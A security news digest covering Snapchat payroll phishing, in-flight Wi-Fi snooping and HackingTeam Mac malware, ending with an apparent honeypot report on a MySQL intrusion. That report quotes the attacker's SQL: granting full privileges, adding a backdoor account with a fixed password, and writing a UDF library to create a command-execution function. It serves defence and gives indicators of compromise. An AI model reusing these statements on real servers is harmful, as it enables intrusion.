Information Security News
by Sean Gallagher
In a blog post on Sunday, Snapchat executives revealed that the payroll data of some current and former employees was exposed as the result of a scam e-mail sent to a human resources employee at the company.
"The good news is that our servers were not breached, and our users’ data was totally unaffected by this," a company spokesperson said in the post. "The bad news is that a number of our employees have now had their identity compromised. And for that, we’re just impossibly sorry."
On February 26, an employee in Snapchat's payroll department received a "spear phishing" e-mail that appeared to be from Snapchat CEO Evan Spiegel—but that came from an external e-mail address. The message requested employee payroll information. The individual targeted didn't recognize the message as a scam, and they forwarded the requested information.
by Sean Gallagher
There's a certain degree of doubt about whether it's possible to hack into an airplane's avionics from the in-flight Wi-Fi, as one security researcher claimed last year. But it's possible to do all sorts of things to fellow passengers—as USA Today columnist Steven Petrow recently found out. Following an American Airlines flight, Petrow was approached by a man who claimed to have gained access to the content of his e-mails, which showed communication with sources for a story Petrow was writing.
Petrow offered a bunch of advice on how to protect privacy on mobile devices (strong passwords, password managers, and encrypted communications apps). But none of these really addresses how he got "hacked"—the in-flight Wi-Fi provided a perfect environment for an attacker to undermine the security of other passengers' communications. It's something that could easily be fixed, but in-flight Internet providers are in no hurry to do so, because it's not in their interest.
When you're on any public Wi-Fi, you're bound to give up some personal information to anyone who might be watching the traffic (whether that be the company providing the service, for marketing purposes, or someone with more malicious intent). For example, in previous tests (such as the ones we conducted with NPR), we saw iPads and iPhones that identified themselves to the network by their owner's name, and Web requests to websites and mobile app traffic (some including personal data) were also visible. And as might have happened to Petrow, old-school POP/SMTP e-mail messages could be practically read off the wire.
Researchers have uncovered what appears to be newly developed Mac malware from HackingTeam, a discovery that's prompting speculation that the disgraced malware-as-a-service provider has reemerged since last July's hack that spilled gigabytes worth of the group's private e-mail and source code.
The sample was uploaded on February 4 to the Google-owned VirusTotal scanning service, which at the time showed it wasn't detected by any of the major antivirus programs. (Ahead of this report on Monday, it was detected by 10 of 56 AV services.) A technical analysis published Monday morning by SentinelOne security researcher Pedro Vilaça showed that the installer was last updated in October or November, and an embedded encryption key is dated October 16, three months after the HackingTeam compromise.
The sample installs a copy of HackingTeam's signature Remote Code Systems compromise platform, leading Vilaça to conclude that the outfit's comeback mostly relies on old, largely unexceptional source code, despite the group vowing in July that it would return with new code.
We had a mysql honeypot getting hit hard with this exploit recently. I am enclosing the word exploit in quotes as the MySQL server was configured to allow logging in without password.
Here are some of the highlights of what happened after the attacker logged in.
First, the attacker makes sure that the root user has all possible privileges:
GRANT ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DROP, EVENT, EXECUTE, FILE, INDEX, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER ON *.* TO [email protected]% FLUSH PRIVILEGES
Next, a backdoor account, mysqld, is added. Interestingly, this is done first by inserting the user into the mysql.user table, then again using the create user and grant command.
insert into mysql.user(Host,User,Password) values(%,mysqld,password(654321*a CREATE USER [email protected]% IDENTIFIED BY 654321*a GRANT ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DROP, EVENT, EXECUTE, FILE, INDEX, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER ON *.* TO [email protected]%
Next, the attacker is degrading the security of our mysql install further, but allowing stored functioned to write data to binary logs:
set global log_bin_trust_function_creators=1
Of course, we may already be infected, so the attacker cleans up prior copies of the malicious code
DROP FUNCTION IF EXISTS lib_mysqludf_sys_infoDROP FUNCTION IF EXISTS sys_getDROP FUNCTION IF EXISTS sys_setDROP FUNCTION IF EXISTS sys_execThen, a set of files is written to /usr/lib/mysql/plubin. This directory *should* be write protected to the mysql user, so this should not work in most installs.select unhex(7F454C4602010100...000000) into dumpfile /usr/lib/mysql/plugin/XXSIlX.so
In case MySQL is properly configured, the same file is also written to /usr/lib/mysql and other locations. Then, the .so file (an ELF binary) is used to create a function.
CREATE FUNCTION sys_eval RETURNS string SONAME XXSIlX.so
It turns out tht this function is essentially an exec that allows executing arbitrary system commands. The attacker will now use it to download additional code (I code errors trying to download the code now). Note that the code is downloaded from web servers that listen on various high ports, not port 80.
Probably the best indicator of compromise is the existence of the mysqld user. This user appears to be common to all the attempts I have seen recently. The file names for the .so files change. Also auditing functions that exist on your MySQL server will help. And PLEASE: Do not expose port 3306 on the internet and set a strong password or use certificates to authenticate.